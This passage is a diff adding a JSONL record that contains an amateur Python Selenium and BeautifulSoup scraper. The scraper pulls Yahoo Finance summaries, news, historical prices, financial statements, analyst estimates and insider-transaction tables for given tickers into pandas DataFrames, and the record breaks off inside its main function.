diff --git "a/228.jsonl" "b/228.jsonl" new file mode 100644--- /dev/null +++ "b/228.jsonl" @@ -0,0 +1,829 @@ +{"seq_id":"16443166604","text":"from selenium import webdriver\nimport pandas as pd\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nimport requests\nimport lxml\nimport urllib.request as ur\nimport warnings\nimport openpyxl\nimport xlsxwriter\nimport time\nfrom selenium.webdriver.common.keys import Keys\nimport datetime\nimport numpy as np\nfrom tabulate import tabulate\nfrom varname import argname2 \nfrom pandas import DataFrame\nimport inspect\nfrom requests_html import HTMLSession\nfrom urllib.parse import urlparse\nfrom datetime import date\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.dirname(__file__)\n return os.path.join(base_path, relative_path)\n\n# driver = webdriver.Remote(desired_capabilities=webdriver.DesiredCapabilities.HTMLUNIT)\n\n#chrome_options.add_argument('headless')\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--log-level=3')\nchrome_options.add_argument('--headless')\nchrome_options.add_argument(\"--window-size=1920,1080\")\nchrome_options.add_argument(\"--disable-extensions\")\nchrome_options.add_argument(\"--proxy-server='direct://'\")\nchrome_options.add_argument(\"--proxy-bypass-list=*\")\nchrome_options.add_argument(\"--start-maximized\")\nchrome_options.add_argument('--disable-gpu')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--ignore-certificate-errors')\nchrome_options.add_argument('--allow-running-insecure-content')\ndriver = webdriver.Chrome('C:\\webdriver\\chromedriver.exe',chrome_options=chrome_options)\n#driver.set_window_position(-10000,0)\n#----------------------------------------------------------------------------Summary----------------------------------------------------\n\npercent_done = 0\n\ndef Summary_Extract(Company_name_list,Company_name):\n URL_summary = \"https://finance.yahoo.com/quote/\" + Company_name\n driver.get(URL_summary)\n driver.implicitly_wait(10)\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # if(\"lookup\" in str(driver.current_url)):\n # driver.close()\n # Company_name_list.remove(Company_name)\n # print(\"PLEASE ENTER A VALID TICKER FOR \"+str(Company_name))\n # while(1):\n # user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING TICKERS): \")\n # if(user_input==\"START\"):\n # break\n # Company_name_list.append(user_input)\n # print(Company_name_list)\n # main_fun(Company_name_list)\n \n \n # ## Find relevant data structures for financials\n summary_list = []\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('td'):\n # Get the contents and titles\n summary_list.append(div.text)\n\n summary_list = list(filter(None, summary_list))\n\n summary_list_final = []\n i_summ = 0\n\n while(i_summ!=len(summary_list)):\n key = summary_list[i_summ]\n val = summary_list[i_summ+1]\n summary_list_final.append([key,val])\n i_summ = i_summ+2\n\n summary_df = pd.DataFrame(summary_list_final,columns=['Summary', 'Value'])\n\n for col in summary_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n summary_df[col] = summary_df[col].str.replace(',', '').astype(float)\n #print(summary_df[col])\n except:\n summary_df.loc[summary_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n \n #print(percent_done+=5.5)\n return summary_df\n\ndef News_Extract(Company_name):\n session = HTMLSession()\n r = session.get(\"https://finance.yahoo.com/quote/\" + Company_name + \"/news\")\n r.html.render(scrolldown = 5000)\n\n news = r.html.find('.js-stream-content',first=False)\n \n dates = []\n h3s = []\n ps = []\n urls = []\n news_list = []\n\n for i in news:\n if('simple-list-item' in str(i)):\n break\n dates.append(i.find('span')[1].text)\n h3s.append(i.find('h3')[0].text)\n ps.append(i.find('p')[0].text)\n temp = i.links\n for i in temp:\n tempurl = urlparse(\"https://finance.yahoo.com\"+str(i))\n urls.append(tempurl.geturl())\n \n for i in range(len(h3s)):\n news_list.append([h3s[i],urls[i],ps[i],dates[i]])\n\n #print(h3s,ps,urls,dates)\n\n #print(news_list)\n news_df = pd.DataFrame(news_list,columns = [\"Article Heading\",\"Article Link\",\"Article Description\",\"Article Date\"])\n #print(news_df)\n return news_df\n\ndef Press_Extract(Company_name):\n session = HTMLSession()\n r = session.get(\"https://finance.yahoo.com/quote/\" + Company_name + \"/press-releases\")\n r.html.render(scrolldown = 5000)\n\n news = r.html.find('.js-stream-content',first=False)\n \n dates = []\n h3s = []\n ps = []\n urls = []\n news_list = []\n\n for i in news:\n if('simple-list-item' in str(i)):\n break\n dates.append(i.find('span')[1].text)\n h3s.append(i.find('h3')[0].text)\n ps.append(i.find('p')[0].text)\n temp = i.links\n for i in temp:\n tempurl = urlparse(\"https://finance.yahoo.com\"+str(i))\n urls.append(tempurl.geturl())\n \n for i in range(len(h3s)):\n news_list.append([h3s[i],urls[i],ps[i],dates[i]])\n\n #print(h3s,ps,urls,dates)\n\n #print(news_list)\n press_df = pd.DataFrame(news_list,columns = [\"Article Heading\",\"Article Link\",\"Article Description\",\"Article Date\"])\n #print(press_df)\n return press_df\n\n \n#----------------------------------------------------------------------------Statistics part----------------------------------------------------\n\ndef Statistics_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/key-statistics\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n\n\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # ## Find relevant data structures for financials\n stats_list = []\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('td'):\n # if(div.find('span')):\n # #print(div.find('span').text)\n # td_list.append([div.find('span').text,div.string])\n\n stats_list.append(div.text)\n # print(div.text)\n # Prevent duplicate titles\n # if not div.string == div.get('title'):\n # td_list.append(div.get('title'))\n\n\n #td_list = list(filter(None, td_list))\n #print(td_list)\n\n stats_list_final = []\n i = 0\n\n while(i!=len(stats_list)):\n key = stats_list[i]\n val = stats_list[i+1]\n stats_list_final.append([key,val])\n i = i+2\n\n stats_df = pd.DataFrame(stats_list_final,columns=['Statistics', 'Value'])\n\n #print(stats_df)\n return stats_df\n\n#----------------------------------------------------------------------------Historical data part----------------------------------------------------\n\ndef Historical_Extract(Company_name):\n URL_Hist = \"https://finance.yahoo.com/quote/\" + Company_name + \"/history\"\n driver.get(URL_Hist)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n time.sleep(3)\n html2 = driver.find_element_by_tag_name('html')\n html2.send_keys(Keys.PAGE_DOWN)\n\n WebDriverWait(driver, 10)\n time.sleep(3)\n\n Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n action = ActionChains(driver)\n action.click(on_element = Time_Period_click)\n action.perform()\n\n Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[3]/button')\n action = ActionChains(driver)\n action.click(on_element = Max_Data)\n action.perform()\n\n Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n action = ActionChains(driver)\n action.click(on_element = Apply)\n action.perform()\n\n\n # try:\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # except:\n # try:\n # time.sleep(5)\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # html2.send_keys(Keys.PAGE_DOWN)\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # Time_Period_click.click()\n # except:\n # time.sleep(10)\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # html2.send_keys(Keys.PAGE_DOWN)\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # Time_Period_click.click()\n\n # time.sleep(1)\n \n # try:\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div/div/div[1]/div/div[3]/div[1]/div/div[2]/section/div[1]/div[1]/div[1]/div/div/div/div/div/ul[2]/li[4]'))\n # Max_Data = driver.find_element_by_xpath('/html/body/div[1]/div/div/div[1]/div/div[3]/div[1]/div/div[2]/section/div[1]/div[1]/div[1]/div/div/div/div/div/ul[2]/li[4]')\n # Max_Data.click()\n # except:\n # try:\n # time.sleep(5)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]'))\n # Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]')\n # Max_Data.click()\n # except:\n # try:\n # time.sleep(10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]/button'))\n # Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]/button')\n # Max_Data.click()\n # except:\n # Historical_Extract(Company_name)\n\n time.sleep(1)\n\n startyear_str = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div/div/div/span').text\n startyear = startyear_str[8:12]\n\n # try:\n # time.sleep(2)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n \n # except:\n # try:\n # time.sleep(5)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n # except:\n # try:\n # time.sleep(10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n # except:\n # time.sleep(15)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n\n time.sleep(3)\n today = date.today()\n endyear = today.strftime(\"%Y\")\n \n\n\n #if 5 years data then scroll till x = 150\n yeardiff = int(endyear) - int(startyear)\n\n if(yeardiff<=5):\n yeardiffscroll = 150\n elif(yeardiff>5 and yeardiff<=10):\n yeardiffscroll = 320\n elif(yeardiff>10 and yeardiff<=15):\n yeardiffscroll = 470\n elif(yeardiff>15 and yeardiff<=20):\n yeardiffscroll = 620\n elif(yeardiff>20 and yeardiff<=25):\n yeardiffscroll = 770\n elif(yeardiff>25 and yeardiff<=30):\n yeardiffscroll = 920\n elif(yeardiff>30 and yeardiff<=35):\n yeardiffscroll = 1070\n elif(yeardiff>36):\n yeardiffscroll = 2000\n\n x = 0\n while(x!=yeardiffscroll):\n html2.send_keys(Keys.PAGE_DOWN)\n x = x + 1\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # Find all HTML data structures that are tds\n hist_list = []\n for div in income_soup.find_all('td'):\n hist_list.append(div.text)\n\n\n #print(hist_list)\n\n #Move all the dividends info to Dividends List and delete all the useless info in the end of the hist_list\n Dividends_hist = []\n Stock_Split = []\n #Remove dividend rows\n for i_hist,val in enumerate(hist_list):\n if(\"Dividend\" in val):\n Dividends_hist.append(hist_list[i_hist-1:i_hist+1])\n del hist_list[i_hist-1:i_hist+1]\n # print(\"Success\")\n elif(\"Stock Split\" in val):\n Stock_Split.append(hist_list[i_hist-1:i_hist+1])\n del hist_list[i_hist-1:i_hist+1]\n elif(\"*Close price adjusted for splits\" in val):\n del hist_list[i_hist:]\n\n\n #print(Dividends_hist)\n #print(hist_list)\n\n #Sort the main list Row_Wise\n hist_list_final = []\n\n\n hist_list_final = list(zip(*[iter(hist_list)]*7))\n\n #Make a dataframe of the sorted list\n hist_df = pd.DataFrame(hist_list_final,columns=['Date', 'Open','High','Low','Close*','Adj Close**','Volume'])\n for col in hist_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n hist_df[col] = hist_df[col].str.replace(',', '').astype(float)\n #print(hist_df[col])\n except:\n hist_df.loc[hist_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n \n Dividends_hist_df = pd.DataFrame(Dividends_hist,columns = [\"Date\",\"Dividends\"])\n Stock_Split_df = pd.DataFrame(Stock_Split,columns=['Date', 'Splits'])\n #print(hist_df)\n return hist_df,Dividends_hist_df,Stock_Split_df\n\n#----------------------------------------------------------------------------Profile-----------------------------------------------------------------\n\ndef Profile_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/profile\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n \n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n #profile_list = []\n prof = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/div[1]/div')\n profile_list = prof.text.splitlines()\n\n Descrip = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/section[2]/p')\n GovtScore = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/section[3]/div')\n profile_list.append(Descrip.text)\n profile_list.append(GovtScore.text)\n \n #print(profile_list)\n\n profile_df = pd.DataFrame(profile_list)\n profile_df = profile_df.transpose()\n #profile_df.columns = ['Name','Address1','Country','Phone Number','Website','Sector','Industry','Employees','Description','Governance Score (1-10, 1 being lowest risk)']\n #print(exec_data)\n\n #print(profile_df)\n\n return profile_df\n\ndef Profile_Extract2(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/profile\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n \n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n exec_list = []\n\n for div in income_soup.find_all('td'):\n exec_list.append(div.text)\n\n exec_data = list(zip(*[iter(exec_list)]*5))\n\n exec_df = pd.DataFrame(exec_data,columns = [\"Name\",\"Title\",\"Pay\",\"Exercised\",\"Year Born\"])\n\n #print(exec_df)\n return exec_df\n\n#----------------------------------------------------------------------------Financials part----------------------------------------------------\n\ndef Financial_Extract(Company_name, Base_Url_Financials, Show_Type):\n urlfinancial = \"https://finance.yahoo.com/quote/\" + Company_name + \"/\" + Base_Url_Financials\n driver.get(urlfinancial)\n\n # if(Financial_Choice == 1):\n # #TO click Quarterly\n # driver.find_element_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div').click()\n time.sleep(2)\n Expand = driver.find_elements_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button')[0]\n action = ActionChains(driver)\n action.click(on_element = Expand)\n action.perform()\n\n driver.implicitly_wait(20)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n time.sleep(2)\n\n # ## Find relevant data structures for financials\n div_list = []\n\n flag_fin = 0\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('div'):\n # Get the contents and titles\n\n if(div.text == \"Breakdown\"):\n flag_fin = 1\n\n if(flag_fin == 1):\n div_list.append(div.string)\n\n # Prevent duplicate titles\n if not div.string == div.get('title'):\n div_list.append(div.get('title'))\n\n\n # Filter out 'empty' elements\n div_list = list(filter(None, div_list))\n\n try:\n tuple_num_index = div_list.index(\"Total Revenue\")\n except:\n try:\n tuple_num_index = div_list.index(\"Total Assets\")\n except:\n tuple_num_index = div_list.index(\"Operating Cash Flow\")\n\n\n # Filter out functions\n div_list = [incl for incl in div_list if not incl.startswith('(function')]\n\n \n\n # # Sublist the relevant financial information\n income_list = div_list\n\n\n\n # # # Insert \"Breakdown\" to the beginning of the list to give it the proper stucture\n income_list.insert(0, 'Breakdown')\n\n for i,val in enumerate(income_list):\n if(val == \"Advertise with us\"):\n del income_list[i-1:]\n break\n\n\n # # # ## Create a DataFrame of the financial data\n # # # Store the financial items as a list of tuples\n\n if(Show_Type == 1):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 2):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 3):\n tuplenum = tuple_num_index+1\n \n income_data = list(zip(*[iter(income_list)]*tuplenum))\n\n # print(income_data)\n # time.sleep(100)\n\n # # # Create a DataFrame\n income_df = pd.DataFrame(income_data)\n #print(income_df)\n time.sleep(5)\n # # Make the top row the headers\n # headers = income_df.iloc[0]\n # income_df = income_df[1:]\n # income_df.columns = headers\n # income_df.set_index('Breakdown', inplace=True, drop=True)\n\n new_header = income_df.iloc[0] #grab the first row for the header\n income_df = income_df[1:] #take the data less the header row\n income_df.columns = new_header #set the header row as the df header\n # warnings.warn('Amounts are in thousands.')\n income_df = income_df.iloc[:, ::-1]\n\n # shift column 'C' to first position\n first_column = income_df.pop('Breakdown')\n \n # insert column using insert(position,column_name,first_column) function\n income_df.insert(0, 'Breakdown', first_column)\n for col in income_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n income_df[col] = income_df[col].str.replace(',', '').astype(float)\n #print(income_df[col])\n except:\n income_df.loc[income_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n\n return income_df\n\ndef Financial_Extract_Quarterly(Company_name, Base_Url_Financials, Show_Type):\n urlfinancial = \"https://finance.yahoo.com/quote/\" + Company_name + \"/\" + Base_Url_Financials\n driver.get(urlfinancial)\n\n time.sleep(2)\n\n WebDriverWait(driver, 10)\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div'))\n Expand1 = driver.find_element_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div')\n action = ActionChains(driver)\n action.click(on_element = Expand1)\n action.perform()\n time.sleep(2)\n\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button'))\n Expand = driver.find_elements_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button')[0]\n action = ActionChains(driver)\n action.click(on_element = Expand)\n action.perform()\n time.sleep(3)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n\n # ## Find relevant data structures for financials\n div_list = []\n\n flag_fin = 0\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('div'):\n # Get the contents and titles\n if(div.text == \"Breakdown\"):\n flag_fin = 1\n\n if(flag_fin == 1):\n div_list.append(div.string)\n\n # Prevent duplicate titles\n if not div.string == div.get('title'):\n div_list.append(div.get('title'))\n\n\n # Filter out 'empty' elements\n div_list = list(filter(None, div_list))\n\n try:\n tuple_num_index = div_list.index(\"Total Revenue\")\n except:\n try:\n tuple_num_index = div_list.index(\"Total Assets\")\n except:\n tuple_num_index = div_list.index(\"Operating Cash Flow\")\n \n\n # Filter out functions\n div_list = [incl for incl in div_list if not incl.startswith('(function')]\n\n\n # # Sublist the relevant financial information\n income_list = div_list\n\n\n\n # # # Insert \"Breakdown\" to the beginning of the list to give it the proper stucture\n income_list.insert(0, 'Breakdown')\n\n for i,val in enumerate(income_list):\n if(val == \"Advertise with us\"):\n del income_list[i-1:]\n break\n\n\n # # # ## Create a DataFrame of the financial data\n # # # Store the financial items as a list of tuples\n\n if(Show_Type == 1):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 2):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 3):\n tuplenum = tuple_num_index+1\n \n income_data = list(zip(*[iter(income_list)]*tuplenum))\n\n # print(income_data)\n # time.sleep(100)\n\n # # # Create a DataFrame\n income_df = pd.DataFrame(income_data)\n #print(income_df)\n time.sleep(5)\n # # Make the top row the headers\n # headers = income_df.iloc[0]\n # income_df = income_df[1:]\n # income_df.columns = headers\n # income_df.set_index('Breakdown', inplace=True, drop=True)\n\n new_header = income_df.iloc[0] #grab the first row for the header\n income_df = income_df[1:] #take the data less the header row\n income_df.columns = new_header #set the header row as the df header\n # warnings.warn('Amounts are in thousands.')\n income_df = income_df.iloc[:, ::-1]\n\n # shift column 'C' to first position\n first_column = income_df.pop('Breakdown')\n \n # insert column using insert(position,column_name,first_column) function\n income_df.insert(0, 'Breakdown', first_column)\n\n for col in income_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n income_df[col] = income_df[col].str.replace(',', '').astype(float)\n #print(income_df[col])\n except:\n income_df.loc[income_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n\n return income_df\n\n#-----------------------------------------------------------------------------Analysis\n\ndef Analysis_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/analysis\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n\n\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # ## Find relevant data structures for financials\n heading_list = []\n\n \n \n for i in income_soup.find_all('th'):\n heading_list.append(i.text)\n\n df1_heading = heading_list[0:5]\n df2_heading = heading_list[5:10]\n df3_heading = heading_list[10:15]\n df4_heading = heading_list[15:20]\n df5_heading = heading_list[20:25]\n df6_heading = heading_list[25:30]\n\n tds = []\n \n for i in income_soup.find_all('td'):\n tds.append(i.text)\n \n df1 = tds[0:25]\n df2 = tds[25:55]\n df3 = tds[55:75]\n df4 = tds[75:100]\n df5 = tds[100:120]\n df6 = tds[120:150]\n\n # df1 = df1_heading+df1\n # df2 = df2_heading+df2\n # df3 = df3_heading+df3\n # df4 = df4_heading+df4\n # df5 = df5_heading+df5\n # df6 = df6_heading+df6\n\n Earnings_DF = np.array(df1)\n Earnings_DF = np.reshape(Earnings_DF, (5,5))\n Earnings_DF = pd.DataFrame(Earnings_DF, columns=df1_heading)\n\n Rev_DF = np.array(df2)\n Rev_DF = np.reshape(Rev_DF, (6,5))\n Rev_DF = pd.DataFrame(Rev_DF, columns=df2_heading)\n\n Earning_hist_DF = np.array(df3)\n Earning_hist_DF = np.reshape(Earning_hist_DF, (4,5))\n Earning_hist_DF = pd.DataFrame(Earning_hist_DF, columns=df3_heading)\n\n EPS_DF = np.array(df4)\n EPS_DF = np.reshape(EPS_DF, (5,5))\n EPS_DF= pd.DataFrame(EPS_DF, columns=df4_heading)\n\n EPS_Rev_DF = np.array(df5)\n EPS_Rev_DF = np.reshape(EPS_Rev_DF, (4,5))\n EPS_Rev_DF = pd.DataFrame(EPS_Rev_DF, columns=df5_heading)\n\n Growth_DF = np.array(df6)\n Growth_DF = np.reshape(Growth_DF, (6,5))\n Growth_DF = pd.DataFrame(Growth_DF, columns=df6_heading)\n\n return Earnings_DF,Rev_DF,Earning_hist_DF,EPS_DF,EPS_Rev_DF,Growth_DF\n\ndef Holders_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/holders\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n dfs = pd.read_html(html)[0]\n dfs1 = pd.read_html(html)[1]\n dfs2 = pd.read_html(html)[2]\n\n return dfs,dfs1,dfs2\n\n\ndef Insider_Roster_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-roster\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n time.sleep(10)\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n #dfs = pd.read_html(html)[0] \n\n td_list = []\n\n for i in income_soup.find_all(\"td\",{\"class\":\"Ta(end)\"}):\n td_list.append(i.text)\n\n indiv_list = []\n design_list = []\n\n for i in income_soup.find_all(\"td\",{\"class\":\"Ta(start)\"}):\n indiv_list.append(i.find(\"a\").text)\n design_list.append(i.text.replace((i.find(\"a\").text),''))\n\n # print(td_list)\n # print(indiv_list)\n # print(design_list)\n\n td_list = list(zip(*[iter(td_list)]*3))\n td_df = pd.DataFrame(td_list,columns = [\"Most Recent Transaction\",\"Date\",\"Shares Owned as of Transaction Date\"])\n\n td_df.insert(0,\"Individual or Entity\",indiv_list)\n td_df.insert(1,\"Designation\",design_list)\n\n return td_df\n\ndef Insider_Transactions_Extract1(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-transactions\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n dfs = pd.read_html(html)[0]\n dfs1 = pd.read_html(html)[1]\n\n #print(dfs,dfs1,dfs2)\n return dfs,dfs1\n\ndef Insider_Transactions_Extract2(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-transactions\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n time.sleep(5)\n\n temp = driver.find_element_by_xpath('//*[@id=\"Col1-1-Holders-Proxy\"]/section/div[2]/div[4]/table/tbody').text.splitlines()\n temp = list(zip(*[iter(temp)]*3))\n\n td_list = []\n temp2 = []\n for i in range(1,len(temp)+1):\n for j in range(1,7):\n temp2.append(driver.find_element_by_xpath('//*[@id=\"Col1-1-Holders-Proxy\"]/section/div[2]/div[4]/table/tbody/tr['+str(i)+']/td['+str(j)+']').text)\n\n for i in temp2:\n if(\"\\n\" in i):\n ind = i.find(\"\\n\")\n ele1 = i[:ind]\n ele2 = i[ind+1:]\n td_list.append(ele1)\n td_list.append(ele2)\n else:\n td_list.append(i)\n\n td_list = list(zip(*[iter(td_list)]*7))\n\n dfs2 = pd.DataFrame(td_list,columns = [\"Insider\",\"Designation\",\"Transaction\",\"Type\",\"Value\",\"Date\",\"Shares\"])\n return dfs2\n\ndef Error_Extract():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n df3 = pd.DataFrame(error_list)\n df4 = pd.DataFrame(error_list)\n df5 = pd.DataFrame(error_list)\n df6 = pd.DataFrame(error_list)\n\n return df1,df2,df3,df4,df5,df6\n \ndef Error_Extract2():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n df3 = pd.DataFrame(error_list)\n\n return df1,df2,df3\n\ndef Error_Extract3():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n\n return df1,df2\n\n\n#----------------------------------------------------------------------------Main Function---------------------------------------------------------\n\n# def namestr(obj, namespace):\n# return [name for name in namespace if namespace[name] is obj][0]\n\ndef retrieve_name(var):\n callers_local_vars = inspect.currentframe().f_back.f_locals.items()\n return [var_name for var_name, var_val in callers_local_vars if var_val is var]\n\n\n#Error in company \"BABA\" in Profile\ndef main_fun(Company_name_list,wrong_tickers):\n today = date.today()\n exceldate = today.strftime(\"%b-%d-%Y\")\n error_list = [\"Cannot scrape\"]\n \n lossy_flag = 0\n lossy_tickers = []\n for Company_name in Company_name_list:\n percent_done = 0\n try:\n Summary = Summary_Extract(Company_name_list,Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Summary = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n News = News_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n News = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Press = Press_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Press = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Statistics = Statistics_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Statistics = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Historical_Data,Dividends,Splits = Historical_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n try:\n Historical_Data,Dividends,Splits = Historical_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Historical_Data,Dividends,Splits = Error_Extract2\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Profile 